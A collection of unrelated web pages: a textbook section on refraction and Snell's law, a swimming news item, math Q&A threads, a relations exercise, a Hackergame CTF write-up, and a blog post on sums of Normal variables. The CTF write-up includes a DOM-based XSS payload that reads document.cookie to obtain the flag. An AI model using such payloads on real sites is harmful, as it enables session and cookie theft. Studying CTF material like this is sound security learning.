Strategy:
The speed of light in a material, $$v$$, can be calculated from the index of refraction $$n$$ of the material using the equation $$n = c/v$$.
Solution:
The equation for index of refraction states that $$n = c/v$$. Rearranging this to determine $$v$$ gives $v = \frac{c}{n}.$ The index of refraction for zircon is given as 1.923 in the table, and $$c$$ is given in the equation for speed of light. Entering these values in the last expression gives $v = \frac{3.00 \times 10^{8} m/s}{1.923}$ $= 1.56 \times 10^{8} m/s.$
Discussion:
This speed is slightly larger than half the speed of light in a vacuum and is still high compared with speeds we normally experience. The only substance listed in the Table that has a greater index of refraction than zircon is diamond. We shall see later that the large index of refraction for zircon makes it sparkle more than glass, but less than diamond.
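The arithmetic here is simple enough to script; a short Python check using the index values quoted above:

```python
c = 2.99792458e8  # speed of light in vacuum, m/s

def speed_in_medium(n):
    """Speed of light in a material with index of refraction n, from v = c/n."""
    return c / n

print(speed_in_medium(1.923))  # zircon: ~1.56e8 m/s
print(speed_in_medium(2.419))  # diamond: ~1.24e8 m/s
```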
# Law of Refraction
Figure 25.4.3 shows how a ray of light changes direction when it passes from one medium to another. As before, the angles are measured relative to a perpendicular to the surface at the point where the light ray crosses it. (Some of the incident light will be reflected from the surface, but for now we will concentrate on the light that is transmitted.) The change in direction of the light ray depends on how the speed of light changes. The change in the speed of light is related to the indices of refraction of the media involved. In the situations shown in Figure 25.4.3, medium 2 has a greater index of refraction than medium 1. This means that the speed of light is less in medium 2 than in medium 1. Note that as shown in Figure 25.4.3a, the direction of the ray moves closer to the perpendicular when it slows down. Conversely, as shown in Figure 25.4.3b, the direction of the ray moves away from the perpendicular when it speeds up. The path is exactly reversible. In both cases, you can imagine what happens by thinking about pushing a lawn mower from a footpath onto grass, and vice versa. Going from the footpath to grass, the front wheels are slowed and pulled to the side as shown. This is the same change in direction as for light when it goes from a fast medium to a slow one. When going from the grass to the footpath, the front wheels can move faster and the mower changes direction as shown. This, too, is the same change in direction as for light going from slow to fast.
Figure 25.4.3. The change in direction of a light ray depends on how the speed of light changes when it crosses from one medium to another. The speed of light is greater in medium 1 than in medium 2 in the situations shown here. (a) A ray of light moves closer to the perpendicular when it slows down. This is analogous to what happens when a lawn mower goes from a footpath to grass. (b) A ray of light moves away from the perpendicular when it speeds up. This is analogous to what happens when a lawn mower goes from grass to footpath. The paths are exactly reversible.
The amount that a light ray changes its direction depends both on the incident angle and the amount that the speed changes. For a ray at a given incident angle, a large change in speed causes a large change in direction, and thus a large change in angle. The exact mathematical relationship is the law of refraction, or "Snell's Law," which is stated in equation form as $n_{1} \sin\theta_{1} = n_{2} \sin\theta_{2}.\tag{25.4.2}$ Here, $$n_{1}$$ and $$n_{2}$$ are the indices of refraction for medium 1 and 2, and $$\theta_{1}$$ and $$\theta_{2}$$ are the angles between the rays and the perpendicular in medium 1 and 2, as shown in Figure 25.4.3. The incoming ray is called the incident ray and the outgoing ray the refracted ray, and the associated angles the incident angle and the refracted angle. The law of refraction is also called Snell’s law after the Dutch mathematician Willebrord Snell (1580–1626), who discovered it in 1621. Snell’s experiments showed that the law of refraction was obeyed and that a characteristic index of refraction $$n$$ could be assigned to a given medium. Snell was not aware that the speed of light varied in different media, but through experiments he was able to determine indices of refraction from the way light rays changed direction.
THE LAW OF REFRACTION:
$n_{1} \sin\theta_{1} = n_{2} \sin\theta_{2}.\tag{25.4.2}$
TAKE-HOME EXPERIMENT: A BROKEN PENCIL:
A classic observation of refraction occurs when a pencil is placed in a glass half filled with water. Do this and observe the shape of the pencil when you look at the pencil sideways, that is, through air, glass, water. Explain your observations. Draw ray diagrams for the situation.
Example 25.4.2: Determine the Index of Refraction from Refraction Data
Find the index of refraction for medium 2 in Figure 25.4.3a, assuming medium 1 is air and given the incident angle is $$30.0^{\circ}$$ and the angle of refraction is $$22.0^{\circ}$$.
Strategy:
The index of refraction for air is taken to be 1 in most cases (and to four significant figures, it is 1.000). Thus $$n_{1} = 1.00$$ here. From the given information, $$\theta_{1} = 30.0^{\circ}$$ and $$\theta_{2} = 22.0^{\circ}$$. With this information, the only unknown in Snell’s law is $$n_{2}$$, so it can be used to find this unknown.
Solution:
Snell's law is $n_{1} \sin\theta_{1} = n_{2} \sin\theta_{2}.$ Rearranging to isolate $$n_{2}$$ gives $n_{2} = n_{1}\frac{\sin\theta_{1}}{\sin\theta_{2}}.$ Entering known values, $n_{2} = (1.00)\frac{\sin 30.0^{\circ}}{\sin 22.0^{\circ}} = \frac{0.500}{0.375}$ $=1.33.$
Discussion:
This is the index of refraction for water, and Snell could have determined it by measuring the angles and performing this calculation. He would then have found 1.33 to be the appropriate index of refraction for water in all other situations, such as when a ray passes from water to glass. Today we can verify that the index of refraction is related to the speed of light in a medium by measuring that speed directly.
Example 25.4.3: A Larger Change in Direction
Suppose that in a situation like that in the previous example, light goes from air to diamond and that the incident angle is $$30.0^{\circ}$$. Calculate the angle of refraction $$\theta_{2}$$ in the diamond.
Strategy:
Again the index of refraction for air is taken to be $$n_{1} = 1.00$$, and we are given $$\theta_{1} = 30.0^{\circ}$$. We can look up the index of refraction for diamond in the table, finding $$n_{2} = 2.419$$. The only unknown in Snell’s law is $$\theta_{2}$$, which we wish to determine.
Solution:
Solving Snell’s law for $$\sin\theta_{2}$$ yields $\sin\theta_{2} = \frac{n_{1}}{n_{2}}\sin\theta_{1}.$ Entering known values, $\sin\theta_{2} = \frac{1.00}{2.419} \sin 30.0^{\circ} = \left( 0.413 \right) \left( 0.500 \right) = 0.207.$ The angle is thus $\theta_{2} = \sin^{-1}(0.207) = 11.9^{\circ}.$
Discussion:
For the same $$30^{\circ}$$ angle of incidence, the angle of refraction in diamond is significantly smaller than in water ($$11.9^{\circ}$$ rather than $$22^{\circ}$$ -- see the preceding example).
This means there is a larger change in direction in diamond. The cause of a large change in direction is a large change in the index of refraction (or speed). In general, the larger the change in speed, the greater the effect on the direction of the ray.
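Both Snell's-law computations above (solving for $$n_{2}$$ and solving for $$\theta_{2}$$) can be reproduced with a short Python sketch; note that the math module works in radians:

```python
import math

def snell_n2(n1, theta1_deg, theta2_deg):
    """Index of medium 2 from measured angles: n1 sin(theta1) = n2 sin(theta2)."""
    return n1 * math.sin(math.radians(theta1_deg)) / math.sin(math.radians(theta2_deg))

def snell_theta2(n1, n2, theta1_deg):
    """Refracted angle in medium 2, in degrees."""
    return math.degrees(math.asin(n1 / n2 * math.sin(math.radians(theta1_deg))))

print(round(snell_n2(1.00, 30.0, 22.0), 2))      # 1.33 (water)
print(round(snell_theta2(1.00, 2.419, 30.0), 1)) # 11.9 (diamond)
```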
# Summary
• The changing of a light ray’s direction when it passes through variations in matter is called refraction.
• The speed of light in vacuum is $$c = 2.99792458 \times 10^{8}\, \mathrm{m/s} \approx 3.00 \times 10^{8}\, \mathrm{m/s}$$.
• Index of refraction $$n = \frac{c}{v}$$, where $$v$$ is the speed of light in the material, $$c$$ is the speed of light in vacuum, and $$n$$ is the index of refraction.
• Snell’s law, the law of refraction, is stated in equation form as $$n_{1} \sin\theta_{1} = n_{2} \sin\theta_{2}$$.
## Glossary
refraction - changing of a light ray’s direction when it passes through variations in matter
index of refraction - for a material, the ratio of the speed of light in vacuum to that in the material
https://swimswam.com/ncaa-denies-request-increase-ncaa-qualifiers-limit-mens-swimming/ | # NCAA Denies Request to Increase NCAA Qualifiers Limit for Men’s Swimming
September 24th, 2014
On Tuesday, the NCAA’s Division II Championships Committee announced over $800,000 in budget allocation increases to enhance “participant opportunities and overall championship experience” for the division’s student-athletes. While 17 requests were approved, a request by swimming & diving was one of 11 requests denied, and one of just three “increases in championship qualifiers” requests that were rejected (wrestling and golf, both requesting a bigger budget, were also denied). Specifically, swimming requested $39,000 for a “field size cap limit adjustment for male swimmers.”
Currently, the Division II meet is capped at 175 men and 205 women.
Among the requests that were approved were increases in championships squad size for women’s volleyball, a men’s soccer bracket expansion to 38 teams, a women’s lacrosse bracket expansion to 12 teams, increased golf super regional sizes, increased football bracket size and squad size, increased championship squad sizes in men’s and women’s basketball, and a baseball bracket expansion to 56 teams.
There were also several approvals for increases in officials pay in various sports, and the addition of an “Eagle Eye” video review system for track & field.
The other change that will directly impact swimming is that teams and individuals located within 600 miles of the championship site will travel via ground transportation, up from 500 miles. This is estimated to save $341,000, which contributed to the increased funding in other areas.

### 8 Comments

D-II Supporter

6 years ago

In the now famous words of John Blutarsky (God rest his soul)…. Eh, hmmmmm, ********!!!!!! Sack participating schools within that extra 100 miles to save $350,000, but can’t spare an extra $40,000 to make sure the Men’s D-II NCAA Swimming Championships has a minimum of 16 competitors in every event.
That’s similar to the reasoning behind the Germans bombing Pearl Harbor????
Great work by our universities president’s…I wonder if Faber U’s Dream Wormer headed up that committee??!!??
D-II Supporter
6 years ago
Oops, Dean Wormer
Phil
6 years ago
I have no problem with extending the bracket sizes of the various sports (as essentially that’s what swimming was asking for), but is it necessary to have more volleyball players and men’s/women’s basketball players suit up to ride the pine at a game that’s already being contested? That makes no sense to me. Those teams were already at that level using the resources they have, and I can assure you (knowing teams that have made it that far in those sports) that there were players not playing that were suited up.
6 years ago
I am somewhat surprised at the not allowing the additional men’s swimmers, but I am shocked at the 600 mile ground transportation rule. Anyone who has spent 10-12 HOURS in a bus or car, will know that feeling you feel at the end of the trip — stiff and feel miserable.
6 years ago
Another swim dad here, albeit a psycho one. My inspired comment on that: secret solution is to take to champs meets only short fly and breaststroke swimmers. They do not need much leg room in the bus and they will be fresher than free and back swimmers of other teams. I got some more good ideas but I am busy pushing our girls to swim and telling our boy to give up unless he wants to convert to football.
Sven
6 years ago
Just wanted to chime in as a short former butterflyer: the image in my head of a bunch of flyers– short, broad shouldered, and pissed off– crammed in a bus like it’s a clown car is pretty hilarious.
But I’m gonna take your idea one step further: let’s just cut out all non-fly events (excepting the 50 and 100 freestyles) from the sport of swimming. Back and free are okay, but so boring to watch and train. I know you mentioned breaststrokers too, but let’s be honest, it’s not a real stroke. This would have saved me untold amounts of misery growing up. Additionally, by giving breaststroke the axe, you and I would disagree much less frequently :-D. I’ll let…
Peter Davis
6 years ago
Tall butterflier here. Yes, please, eliminate breaststroke. Now, about your joint proposal, I can get behind that…or to the left of it, as it were. In fact, four of my close friends and I will back up the proposal. So you might say….I got five on it.
6 years ago
Do NCAA execs fly or take their own car when they travel distances are 200 miles or more? (FYI – 200 miles is about 3 1/2 hours in a car – so I’d bet they fly). Seems like another place to save some money.
Braden Keith is the Editor-in-Chief and a co-founder/co-owner of SwimSwam.com. He first got his feet wet by building The Swimmers' Circle beginning in January 2010, and now comes to SwimSwam to use that experience and help build a new leader in the sport of swimming. Aside from his life on the InterWet, …
http://mathoverflow.net/questions/52563/approximating-expectation?sort=newest | # Approximating expectation [closed]
If we are given a finite number $N$ of points drawn from a probability distribution, the expectation can be approximated as a finite sum over these points: $E[f] \approx \frac{1}{N}\sum_{i=1}^{N} f(x_i)$.
Comparing this to the actual calculation $E[f] = \sum_{x} p(x)f(x)$, won't the difference between the actual value and the approximate value be large in cases where $p(x)$ varies a lot?
## closed as not a real question by Nate Eldredge, George Lowther, Qiaochu Yuan, Yemon Choi, Andres CaicedoJan 20 '11 at 6:39
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. If this question can be reworded to fit the rules in the help center, please edit the question.
Yes it might. The standard deviation of the sample mean will be large if the underlying distribution has too large standard deviation (if that's what you mean by "varies a lot"). But this is far from a research level question, so not really suitable here. Maybe math.stackexchange would be a better fit? – George Lowther Jan 20 '11 at 0:24
Or stats.stackexchange.com. You are interested in something like the variance of the sample mean. – Nate Eldredge Jan 20 '11 at 3:57
## 1 Answer
The Strong Law of Large Numbers guarantees almost sure convergence of the sample mean to the population mean. If your distribution has large variance then yes the convergence is slower. However, the probability of being away from the population mean is bounded by:
$P(|s_n-\mu|>\epsilon)<\frac{\sigma^2}{n\epsilon^2}$
where $\mu$ and $\sigma$ are the true mean and standard deviation and $s_n$ is the sample mean from $n$ points.
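A quick Monte Carlo sketch in Python illustrates the bound; the Exp(1) population is an arbitrary choice with $\mu = \sigma^2 = 1$, so with $n = 100$ and $\epsilon = 0.5$ the bound is $0.04$:

```python
import random

def sample_mean(n, rng):
    # mean of n draws from an Exp(1) population (true mean 1, variance 1)
    return sum(rng.expovariate(1.0) for _ in range(n)) / n

rng = random.Random(0)
mu, sigma2 = 1.0, 1.0
n, eps, trials = 100, 0.5, 2000
misses = sum(abs(sample_mean(n, rng) - mu) > eps for _ in range(trials))
bound = sigma2 / (n * eps**2)
print(misses / trials, "<=", bound)  # empirical frequency respects the bound
```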
It's worth commenting that all bets are off if the population has a distribution that doesn't have a finite variance. – Brian Borchers Jan 20 '11 at 0:44
@Brian: the SLLN holds with no assumption on the variance. It requires only the assumption of finite mean. – Qiaochu Yuan Jan 20 '11 at 0:49
Are there rate of convergence estimates when dealing with infinite variance? I would guess one would have to truncate the random variables... – Alex R. Jan 20 '11 at 1:30
@Alex Yes, there are long books written on the subject (see, eg, Gnedenko/Kolmogorov, or Feller v II, especially the section on Stable Laws). – Igor Rivin Jan 20 '11 at 3:26
http://clay6.com/qa/6380/determine-whether-relation-r-is-reflexive-symmetric-and-transitive-relation
# Determine whether Relation $R$ is reflexive, symmetric and transitive: Relation $R$ in the set $A$ of all human beings in a town at a particular time given by $R=\{(x,y):\; x$ is exactly $7\;cm$ taller than $y\}$
Toolbox:
• A relation $R$ in a set $A$ is called reflexive if $(a,a) \in R$ for every $a \in A$
• A relation $R$ in a set $A$ is called symmetric if $(a_1,a_2) \in R \Rightarrow (a_2,a_1) \in R$ for all $a_1,a_2 \in A$
• A relation $R$ in a set $A$ is called transitive if $(a_1,a_2) \in R$ and $(a_2,a_3) \in R$ imply that $(a_1,a_3) \in R$ for all $a_1,a_2,a_3 \in A$
Given set $A$ of all human beings in a town at a particular time and $R=\{(x,y):\; \text{x is exactly 7cm taller than y}\}$
For reflexivity: obviously $(x,x) \not \in R$ for any $x$, as $x$ cannot be 7cm taller than itself. Hence $R$ is not reflexive.
If $x$ is exactly 7cm taller than $y$, $y$ obviously cannot be exactly 7cm taller than $x\; \rightarrow (x,y) \in R$, but $(y,x) \not \in R$. Therefore $R$ is not symmetric.
If $x$ is exactly 7cm taller than $y$, and $y$ is exactly 7cm taller than $z \; \rightarrow$ $x$ is obviously exactly 7+7 = 14cm taller than $z$ and not exactly 7cm taller than $z$.
Therefore, $(x,y) \in R, (y,z) \in R$ but $(x,z) \not \in R$. Hence $R$ is not transitive.
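The three checks above can be mirrored on a finite sample in Python; the heights below are hypothetical values (in cm), chosen so that consecutive people differ by exactly 7 cm:

```python
# Hypothetical heights in cm; R relates x to y when x is exactly 7 cm taller than y
heights = [150, 157, 164, 171]
R = {(x, y) for x in heights for y in heights if x - y == 7}

reflexive  = all((a, a) in R for a in heights)
symmetric  = all((b, a) in R for (a, b) in R)
transitive = all((a, c) in R for (a, b) in R for (b2, c) in R if b == b2)
print(reflexive, symmetric, transitive)  # False False False
```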
https://math.stackexchange.com/questions/1836858/how-is-expressing-a-differential-operator-in-cylindrical-coordinates-rigorou | # How is “expressing” a differential operator “in cylindrical coordinates” rigorously defined?
I'm a mathematician (with little knowledge of differential geometry) trying to study physics. One of the greatest problems is the language regarding coordinate transformations. I tend to think of such transformations as functions (diffeomorphisms), whereas physicists just rename the arguments, e.g. $f(x,y,z)=f(\rho,\varphi,z)$.
I've gotten used to that and for some things (e.g. integration) it works just fine. But I can't get my head around the transformation (?) of differential operators. For example:
Let $f:\mathbb{R}^3\backslash\big(\{0\}\times\{0\}\times\mathbb{R}\big)\rightarrow\mathbb{R}$ be smooth. I have before me the statement that "in cylindrical coordinates" $$\nabla f=\vec{\mathbf{e}}_\rho\frac{\partial f}{\partial\rho}+\vec{\mathbf{e}}_\varphi\frac{1}{\rho}\frac{\partial f}{\partial\varphi}+\vec{\mathbf{e}}_z\frac{\partial f}{\partial z}.$$
Now you probably consider me a pedant, but I can only try to understand that by introducing the mapping $\theta:]0,\infty[\times\mathbb{R}\times\mathbb{R}\rightarrow\mathbb{R}^3$, $$\theta(\rho,\varphi,z)=(\rho\cos\varphi,\rho\sin\varphi,z).$$
My understanding is that the above equation is actually $$\nabla(f\circ\theta)=\vec{\mathbf{e}}_\rho\partial_1(f\circ\theta)+\vec{\mathbf{e}}_\varphi\frac{1}{\rho}\partial_2(f\circ\theta)+\vec{\mathbf{e}}_z\partial_3(f\circ\theta).$$ Or is it $\left(\nabla f\right)\circ\theta$ instead of $\nabla(f\circ\theta)$?
And what are these vectors $\vec{\mathbf{e}}_\rho,\vec{\mathbf{e}}_\varphi,\vec{\mathbf{e}}_z$? I read that $\vec{\mathbf{e}}_\varphi$ is the "unit vector in $\varphi$-direction". But what does that even mean? How can one express these "unit vectors" using $\theta$?
There is a lot in the literature about how to derive such equations, but I can't really use it because I don't understand the meaning behind the symbols and I don't really understand the point of it all.
• Well, for example, $\vec{e}_\rho = \vec{e}_x \cos \varphi + \vec{e}_y \sin \varphi$. (Yes, that means there is an implicit dependence on $\varphi$.) – Zhen Lin Jun 23 '16 at 11:59
(If you can find a library copy, Jan J. Koenderink's Solid Shape is a highly worthwhile if somewhat idiosyncratic read, a profoundly geometric introduction to differential geometry geared toward engineers and physicists, in the aesthetic spirit of Hilbert and Cohn-Vossen.)
If $x = (x_{1}, \dots, x_{n})$ is a coordinate system (which formally should be viewed as Cartesian, since "differential calculus looks the same in arbitrary coordinates"), the standard basis vector fields are viewed as partial differentiation operators, $$\mathbf{e}_{j} \leftrightarrow \frac{\partial}{\partial x_{j}},$$ via their action as directional derivatives on functions: $$\mathbf{e}_{j}(x) f = \lim_{t \to 0} \frac{f(x + t\mathbf{e}_{j}) - f(x)}{t} = \frac{\partial f}{\partial x_{j}}(x) = \frac{\partial}{\partial x_{j}}(x) f.$$
Briefly, the issues in your question boil down to the chain rule, which enters as soon as you "compare" derivatives with respect to two different coordinate systems.
If $\theta:\mathbb{R}^{n} \to \mathbb{R}^{n}$ is a continuously-differentiable change of coordinates, and if we write $y = \theta(x)$, then in "classical" notation, $$\frac{\partial}{\partial x_{j}} = \frac{\partial y_{1}}{\partial x_{j}}\, \frac{\partial}{\partial y_{1}} + \dots + \frac{\partial y_{n}}{\partial x_{j}}\, \frac{\partial}{\partial y_{n}}. \tag{1}$$
Particularly, if $$(x, y, z) = \theta(\rho, \varphi, z) = (\rho\cos\varphi, \rho\sin\varphi, z),$$ then (pardon the use of $z$ in two conceptually-distinct but logically-identical (!) roles) \begin{alignat*}{3} \mathbf{e}_{\rho} &:= \frac{\partial}{\partial\rho} &&= \frac{\partial x}{\partial\rho}\, \frac{\partial}{\partial x} + \frac{\partial y}{\partial\rho}\, \frac{\partial}{\partial y} + \frac{\partial z}{\partial\rho}\, \frac{\partial}{\partial z} &&= \cos\varphi\, \mathbf{e}_{1} + \sin\varphi\, \mathbf{e}_{2}; \\ \mathbf{e}_{\varphi} &:= \frac{\partial}{\partial\varphi} &&= \frac{\partial x}{\partial\varphi}\, \frac{\partial}{\partial x} + \frac{\partial y}{\partial\varphi}\, \frac{\partial}{\partial y} + \frac{\partial z}{\partial\varphi}\, \frac{\partial}{\partial z} &&= -\rho\sin\varphi\, \mathbf{e}_{1} + \rho\cos\varphi\, \mathbf{e}_{2}; \\ \mathbf{e}_{z} &:= \frac{\partial}{\partial z} &&= \frac{\partial x}{\partial z}\, \frac{\partial}{\partial x} + \frac{\partial y}{\partial z}\, \frac{\partial}{\partial y} + \frac{\partial z}{\partial z}\, \frac{\partial}{\partial z} &&= \mathbf{e}_{3}. \end{alignat*} To express the Cartesian frame $(\mathbf{e}_{1}, \mathbf{e}_{2}, \mathbf{e}_{3})$ in terms of the cylindrical frame $(\mathbf{e}_{\rho}, \mathbf{e}_{\varphi}, \mathbf{e}_{z})$, one either inverts the preceding system with linear algebra, or else (locally) inverts the change of coordinates $\theta$ itself, and computes the corresponding partial derivatives for (1). (The results agree by the chain rule.)
The "modern" viewpoint is that each coordinate domain ($U$ and $V$, say) is a smooth ($3$-)manifold, and each coordinate system defines a trivialization of the respective tangent bundle via its coordinate vectors. The coordinate change $\theta:U \to V$ induces an isomorphism $\theta_{*}:TU \to TV$, defined by $$\theta_{*}(x, v) = \bigl(\theta(x), D\theta(x)(v)\bigr).$$ Consequently, there are two frames for $TV$: The "native" coordinate frame in $V$ (the $\partial/\partial y_{i}$ in (1)), and the "transplanted" image of the coordinate frame from $U$ (the $\partial/\partial x_{j}$ in (1), which properly speaking are $\theta_{*}\partial/\partial x_{j}$). The chain rule expresses the latter as linear combinations of the former.
If your primary interest is computation, it's best to get comfortable with the classical (abuses of) notation. :) | 2019-07-20 21:53:07 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.951128363609314, "perplexity": 900.5169889141962}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526714.15/warc/CC-MAIN-20190720214645-20190721000645-00031.warc.gz"} |
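As a concrete numerical sanity check of the question's formula (in Python, with an arbitrary smooth test function $f$ and the *unit* vectors $\vec{\mathbf{e}}_\rho = (\cos\varphi, \sin\varphi, 0)$, $\vec{\mathbf{e}}_\varphi = (-\sin\varphi, \cos\varphi, 0)$, $\vec{\mathbf{e}}_z = (0,0,1)$, i.e. the coordinate vectors above with $\partial/\partial\varphi$ rescaled by $1/\rho$): the left-hand side is $(\nabla f)\circ\theta$, while the partial derivatives on the right are those of $f\circ\theta$:

```python
import math

def f(x, y, z):
    # an arbitrary smooth test function, chosen only for this check
    return x**2 * y + math.sin(z)

def theta(rho, phi, z):
    # cylindrical -> Cartesian coordinates
    return (rho * math.cos(phi), rho * math.sin(phi), z)

def grad_cartesian(x, y, z, h=1e-6):
    # central-difference approximation of the Cartesian gradient of f
    return ((f(x + h, y, z) - f(x - h, y, z)) / (2 * h),
            (f(x, y + h, z) - f(x, y - h, z)) / (2 * h),
            (f(x, y, z + h) - f(x, y, z - h)) / (2 * h))

def grad_cylindrical(rho, phi, z, h=1e-6):
    # e_rho d(f.theta)/drho + e_phi (1/rho) d(f.theta)/dphi + e_z d(f.theta)/dz
    g = lambda r, p, w: f(*theta(r, p, w))  # g = f composed with theta
    d_rho = (g(rho + h, phi, z) - g(rho - h, phi, z)) / (2 * h)
    d_phi = (g(rho, phi + h, z) - g(rho, phi - h, z)) / (2 * h)
    d_z   = (g(rho, phi, z + h) - g(rho, phi, z - h)) / (2 * h)
    e_rho = (math.cos(phi), math.sin(phi), 0.0)
    e_phi = (-math.sin(phi), math.cos(phi), 0.0)
    e_z   = (0.0, 0.0, 1.0)
    return tuple(e_rho[i] * d_rho + e_phi[i] * d_phi / rho + e_z[i] * d_z
                 for i in range(3))

p = (1.3, 0.7, -0.4)                  # a point in (rho, phi, z)
lhs = grad_cartesian(*theta(*p))      # (grad f) evaluated after theta
rhs = grad_cylindrical(*p)
print(max(abs(a - b) for a, b in zip(lhs, rhs)))  # ~0 (discretization error only)
```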
https://yanhuijessica.github.io/Chictf-Writeups/web/calculus_calc_exercise/ | 2022 | The 9th USTC Information Security Competition (Hackergame) | Web
# 微积分计算小练习 (Calculus Calculation Exercise)
## Challenge
bot.py
```python
# Copyright 2022 USTC-Hackergame
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from selenium import webdriver
import selenium
import sys
import time
import urllib.parse
import os

# secret.py will NOT be revealed to players
from secret import FLAG, BOT_SECRET

url = input('> ')

# URL replacement
# In our environment bot access http://web
# If you need to test it yourself locally you should adjust LOGIN_URL and remove the URL replacement source code
parsed = urllib.parse.urlparse(url)
parsed = parsed._replace(netloc="web", scheme="http")
url = urllib.parse.urlunparse(parsed)

try:
    options = webdriver.ChromeOptions()
    options.add_argument('--no-sandbox')  # sandbox not working in docker
    os.environ['TMPDIR'] = "/dev/shm/"
    with webdriver.Chrome(options=options) as driver:
        ua = driver.execute_script('return navigator.userAgent')
        print(' I am using', ua)
        time.sleep(4)
        print(' Putting secret flag...')
        time.sleep(1)
        print('- Now browsing your quiz result...')
        driver.get(url)
        time.sleep(4)
        try:
            greeting = driver.execute_script(f"return document.querySelector('#greeting').textContent")
            score = driver.execute_script(f"return document.querySelector('#score').textContent")
        except selenium.common.exceptions.JavascriptException:
            print('JavaScript Error: Did you give me correct URL?')
            exit(1)
        print("OK. Now I know that:")
        print(greeting)
        print(score)
        print('- Thank you for joining my quiz!')
except Exception as e:
    print('ERROR', type(e))
    import traceback
    traceback.print_exception(*sys.exc_info(), limit=0, file=None, chain=False)
```
## Approach
• The practice site lets you enter your name and answers to the questions
• After submission you are redirected to a score page, and HTML tags in the name you entered are not filtered
• My first thought was reflected XSS. It worked in local tests (I could capture the requests), but I never received a request from the bot. Re-reading bot.py, I noticed the bot only visits http://web and has no access to the external network; combined with the name being echoed back on the page, this is actually DOM-based XSS
• Injecting a <script> tag directly does not execute the script (scripts inserted into the DOM via innerHTML do not run), so the following payload is used to read the flag
<p id='cookie'></p><img src=x onerror="javascript: document.getElementById('cookie').innerHTML = document.cookie;">
### Flag
flag{xS5_1OI_is_N0t_SOHARD}
Contributors: YanhuiJessica
https://statr.me/2012/09/is-normal-normal/

The rumor says that the Normal distribution is everything.
It will take a long long time to talk about the Normal distribution thoroughly. However, today I will focus on a (seemingly) simple question, as is stated below:
If $X$ and $Y$ are univariate Normal random variables, will $X+Y$ also be Normal?
What’s your reaction towards this question? Well, at least for me, when I saw it I said “Oh, it’s stupid. Absolutely it is Normal. And what’s more, any linear combination of Normal random variables should be Normal.”
Well, I was wrong, and that’s why I want to write this blog.
A counter-example is given by the book Statistical Inference (George Casella and Roger L. Berger, 2nd Edition), in Exercise 4.47:
Let $X$ and $Y$ be independent $N(0,1)$ random variables, and define a new random variable $Z$ by
$$Z = \begin{cases} X &\text{if } XY > 0 \\ -X & \text{otherwise} \end{cases}$$
Then it can be shown that $Z$ has a normal distribution, while $Y+Z$ does not.
Here I will not put any analytical proof, but use some descriptive graphs to show this. Below is the R code to do the simulation.
set.seed(123);
x = rnorm(2000);
y = rnorm(2000);
z = ifelse(x * y > 0, x, -x);
par(mfrow = c(2, 1));
hist(y);
hist(z);
x11();
hist(y + z);
We generate random samples of $X,Y$ and $Z$, and then use histograms to show their distributions.
The result is clear: both $Y$ and $Z$ should be Normal, but $Y+Z$ has a bimodal distribution, which is obviously non-Normal.
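The same check can be reproduced in Python (a sketch with NumPy, in place of the R code above; the seed and sample size are arbitrary). The key structural fact is that $Z$ always carries the same sign as $Y$, so $|Y+Z|=|Y|+|Z|$ and the sum leaves a gap around zero:

```python
import numpy as np

rng = np.random.default_rng(123)
n = 100_000
x = rng.standard_normal(n)
y = rng.standard_normal(n)
z = np.where(x * y > 0, x, -x)  # the counter-example: Z = X if XY > 0, else -X

# Z and Y always share a sign: if XY > 0 then ZY = XY > 0, else ZY = -XY >= 0.
assert np.all(y * z >= 0)

# Hence |Y + Z| = |Y| + |Z|, so Y + Z puts almost no mass near 0 (bimodal),
# while a sum of independent Normals would concentrate there.
near_zero = np.mean(np.abs(y + z) < 0.2)
normal_ref = np.mean(np.abs(y + rng.standard_normal(n)) < 0.2)
print(near_zero, normal_ref)
```

The fraction of samples of $Y+Z$ near zero is an order of magnitude smaller than for a genuinely Normal sum, which is exactly the valley between the two modes in the histogram.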
So what’s wrong? We often hear that linear combinations of Normal r.v.’s are also Normal, but an important condition is often omitted: their joint distribution must be multivariate Normal. The formal proposition is stated below:
If $X$ follows a multivariate Normal distribution, then any linear combination of the elements of $X$ also follows a Normal distribution.
